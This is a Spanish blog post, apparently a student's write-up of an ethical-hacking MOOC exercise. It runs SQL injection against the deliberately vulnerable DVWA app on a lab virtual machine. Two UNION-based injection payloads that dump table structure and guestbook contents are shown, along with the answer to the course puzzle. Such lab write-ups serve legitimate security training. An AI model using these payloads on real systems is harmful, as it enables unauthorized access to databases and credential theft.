SQL injection

En esta tarea voy a usar la técnica SQL injection para obtener información relevante sobre la estructura de una base de datos. En concreto, voy a obtener información de usuarios de un servidor (nombre de usuario, hash de la contraseña) a partir de un ataque de SQL injection.

Nota: empleo esta máquina virtual como objetivo.

Utilizo la siguiente Web App (DVWA): http://direccionIP/login.php (direccionIP: dirección del objetivo)

  • Username: admin
  • Password: password

seleccion_001

A continuación sigo las indicaciones del apartado 9 de ESTE ARTÍCULO.

Dejo aquí el proceso completo: SQL_injection.pdf


Resolución del enigma (2ºEd. MOOC Hacking Ético Universidad Mondragón)

%’ and 1=0 union select null, concat(table_name,0x0a,column_name) from information_schema.columns where table_name = ‘guestbook’ #

Selección_002.jpg

%’ and 1=0 union select null, concat(comment_id,0x0a,comment,0x0a,name,0x0a,name) from guestbook #

seleccion_003

The key is “use the force”, Luke.
 ¡Enhorabuena! Has resuelto el enigma… ya puedes solicitar audiencia con el Consejo Jedi:
…y se dejaba la url para acceder al Consejo.


♣ Reflexión: “security level low”


 

 

 

 

Anuncios

Responder

Introduce tus datos o haz clic en un icono para iniciar sesión:

Logo de WordPress.com

Estás comentando usando tu cuenta de WordPress.com. Cerrar sesión / Cambiar )

Imagen de Twitter

Estás comentando usando tu cuenta de Twitter. Cerrar sesión / Cambiar )

Foto de Facebook

Estás comentando usando tu cuenta de Facebook. Cerrar sesión / Cambiar )

Google+ photo

Estás comentando usando tu cuenta de Google+. Cerrar sesión / Cambiar )

Conectando a %s